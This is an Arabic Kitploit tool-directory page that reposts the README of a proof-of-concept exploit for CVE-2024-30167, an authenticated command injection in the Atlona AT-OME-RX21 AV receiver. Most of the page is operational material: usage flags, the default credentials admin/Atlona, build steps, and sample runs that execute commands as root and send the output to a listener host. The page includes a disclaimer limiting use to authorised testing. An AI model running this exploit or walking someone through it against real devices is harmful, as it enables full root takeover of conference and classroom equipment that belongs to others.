Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-30167 — إثبات مفهوم لاستغلال حقن أوامر مُصادق عليه في جهاز Atlona AT-OME-RX21، مما يسمح بتنفيذ أوامر على مستوى الجذر عبر واجهة إعدادات الوقت. | Kitploit
أدوات/GitHubGitHub/rizzziom/cve-2024-30167
أمان الأنظمة المدمجةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubrizzziom/cve-2024-30167

CVE-2024-30167

إثبات مفهوم لاستغلال حقن أوامر مُصادق عليه في جهاز Atlona AT-OME-RX21، مما يسمح بتنفيذ أوامر على مستوى الجذر عبر واجهة إعدادات الوقت.

عرض المستودع
112منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم لثغرة حقن أوامر موثقة في Atlona OME

إخلاء مسؤولية: يُقدَّم إثبات المفهوم هذا للأغراض التعليمية والبحثية فقط. لا تستخدم هذا الرمز على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. لست مسؤولاً عن أي إساءة استخدام.

توجد ثغرة حقن أوامر موثقة في واجهة إعداد الوقت لمبدل AV Atlona AT-OME-RX21. يمكن للمستخدم الذي يمتلك بيانات اعتماد صالحة حقن أوامر نظام التشغيل التي يتم تنفيذها بصلاحيات الجذر (root)، مما يؤدي إلى اختراق كامل للنظام.

معلومات المنتج

Atlona AT-OME-RX21 هو مستقبل ومقياس AV (صوت/فيديو) مصمم لبيئات مؤتمرات الفيديو والتعاون الاحترافية. يُستخدم غالباً في غرف المؤتمرات والفصول الدراسية ومساحات الاجتماعات الصغيرة. يساعد في توصيل الأجهزة مثل أجهزة الكمبيوتر المحمولة/أنظمة المؤتمرات بالشاشات.

يعمل إثبات المفهوم هذا مع جميع إصدارات البرامج الثابتة <= 1.5.1

معلومات البائع: https://atlona.com/product/at-ome-rx21/

الاستخدام

$ .\cve-2024-30167.exe -h


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Usage of cve-2024-30167.exe:
  -P string
        listening port for command output (default "4444")
  -c string
        Command to execute on the target
  -l string
        listening host for command output
  -p string
        Password for authentication (default "Atlona")
  -t string
        Target URL (e.g: http://example.com)
  -u string
        Username for authentication (default "admin")
  1. إنشاء ملف ثنائي لنظامك
go build -o <OUTPUT_FILENAME>
  1. تشغيل الاستغلال ضد جهاز Atlona الهدف
$ .\cve-2024-30167.exe -P 8000 -c 'whoami' -l 192.168.1.100 -t http://192.168.1.103:1337


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Listening on 192.168.1.100:8000 for response...
Command Injection Successful

=====Received Response=====
root

$ .\cve-2024-30167.exe -P 8000 -c 'id' -l 192.168.1.100 -t http://192.168.1.103:1337    


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Listening on 192.168.1.100:8000 for response...
Command Injection Successful

=====Received Response=====
uid=0(root) gid=0(root) groups=0(root)

يستخدم الأمر أعلاه بيانات الاعتماد الافتراضية لتسجيل الدخول إلى الجهاز.

الصيغة:

.\cve=2024-30167.exe -P <listening_port> -c <command> -l <listener_host> -t <target_uri> -u <username> -p <password>

تنزيل الأداة